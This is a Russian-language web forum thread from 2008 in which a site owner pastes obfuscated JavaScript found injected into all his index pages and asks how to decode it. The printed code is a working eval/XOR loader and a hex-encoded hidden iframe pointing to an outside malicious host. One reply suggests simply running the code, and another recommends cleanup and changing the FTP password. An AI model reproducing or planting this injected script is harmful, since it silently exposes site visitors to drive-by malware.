| |
|
|
| | Всем привет!
Всем кто встречался с подобным, откликнитесь..
На, одном из моих сайтов произошел - казус, в лице китайских "колхозников".. :)
при входе в админку антивир. кликнул на рассыльщика почты!!!!
ну, я как честный гражданин, полез в код где изъял нахально прикрепленный кусок кода во всех index_ах проекта. :))))))
вот код:
<script>
IILLL="98e9878c80968e868d97cd94918a9786cbc 4df8a8591828e86c3909180dec18c818596 908082978687cd8d828e86cc8a8d87869bc d938b93c1c3948a87978bded2c38b868a84 8b97ded2c390979a8f86dec1958a908a818 a8f8a979ad98b8a8787868dc1dddfcc8a85 91828e86ddc4cad8e9878c80968e868d97c d94918a9786cbc4df8a8591828e86c39091 80dec18b979793d9cccc9791dad1cd808dc c80848ace818a8dcc9497908a8dcd80848a dc8a87ded1c1c3948a87978bded2c38b868 a848b97ded2c390979a8f86dec1958a908a 818a8f8a979ad98b8a8787868dc1dddfcc8 a8591828e86ddc4cad8e99eaaafafafdec1 ad82adc1d8aaafaaaaafdec1c1d8";
ILLL="";
ILIII="function func() {IIIL=eval;IILL=unescape;ILLI=String.fromCharCode;IILIL=Math.PI;ILLII=parseInt;IIIIL=ILLII(~((IILIL&IILIL)|(~IILIL&IILIL)&(IILIL&~IILIL)|(~IILIL&~IILIL)));IILI=ILLII(((IIIIL&IIIIL)|(~IIIIL&IIIIL)&(IIIIL&~IIIIL)|(~IIIIL&~IIIIL))&1);ILIL=IILI<<IILI;ILIIL=IIIIL;for(ILLLI=IIIIL;ILLLI<ILIII.length;ILLLI-=-IILI)ILIIL+=ILLII(ILIII.charCodeAt(ILLLI));ILIIL=ILIIL.toString();ILIIL%=IILL(0x64);for(IILLI=IIIIL;IILLI<(IILLL.length>>IILI);IILLI-=-IILI){IIII='';for(ILILL=IIIIL;ILILL<ILIL;ILILL-=-IILI)IIII+=IILLL.charAt(IILLI*ILIL+ILILL);ILLL+=ILLI(IILL(0xFF)-ILLII(ILLII(IIII,ILIL<<(ILIL+IILI))^ILIIL));}try{IIIL(ILLL);} catch(e){try{eval(ILLL);} catch(e) {window.location='/';}}}func();";
eval(ILIII);
</script><script>function v494bf32fad5f2(v494bf32fadba8){ function v494bf32fadfaf () {var v494bf32fae3ab=16; return v494bf32fae3ab;} return(parseInt(v494bf32fadba8,v494bf32fadfaf()));}function v494bf32fae7a7(v494bf32faebae){ var v494bf32faf7a3=2; var v494bf32faefaa='';for(v494bf32faf3a6=0; v494bf32faf3a6<v494bf32faebae.length; v494bf32faf3a6+=v494bf32faf7a3){ v494bf32faefaa+=(String.fromCharCode(v494bf32fad5f2(v494bf32faebae.substr(v494bf32faf3a6, v494bf32faf7a3))));}return v494bf32faefaa;} document.write(v494bf32fae7a7('3C696672616D65206E616D653D273931373 46337346133383827207372633D27687474 703A2F2F747239322E636E2F6367692D626 96E2F777473696E2E6367693F69643D3227 2077696474683D373631206865696768743 D333531207374796C653D27646973706C61 793A6E6F6E65273E3C2F696672616D653E'));</script>
|
ну, принял меры, правда дыру еще не залатал, время нет. доживем до выходных.
кстати,код привязан на:
http://an92.net/myy/firefox.pdf\firefox
|
Народ, особо обращаюсь к тем кто шарит: кто подскажет как расшифровать.. сие счастье свалившееся на мою голову??? :)))
буду очень признателен если кто поделится опытом, наверное подобное многим интересно?
ЗАРАНЕЕ БЛАГОДАРЕН!!! | |
| |
|
|
| |
|
|
| |
для: Denandi
(22.12.2008 в 20:31)
| | | 3C696672616D65206E616D653D273931373 = <iframe name= ну и т.д., в общем на ваших страницах создается фрейм-шкодник. | |
| |
|
|
| |
|
|
| |
для: sim5
(22.12.2008 в 20:40)
| | | урывками где код проясняется, я это вижу, интерес возник из-за не читабельности яваскрипта - как его расшифровать?
кто нибудь, подобным баловался? | |
| |
|
|
| |
|
|
| |
для: Denandi
(22.12.2008 в 20:45)
| | | Запустите его у себя на исполение. Она сам себя распакует. | |
| |
|
|
| |
|
|
| |
для: sim5
(22.12.2008 в 20:47)
| | | Я в шоке!!!!!.. во суки!!! :) | |
| |
|
|
| |
|
|
| |
для: Denandi
(22.12.2008 в 20:31)
| | | Была у меня тема
Сталкивался.
Почистил комп авастом
Поменял пароль на ftp Если этого не сделать, зловредный код будет периодически появляться снова. | |
| |
|
|
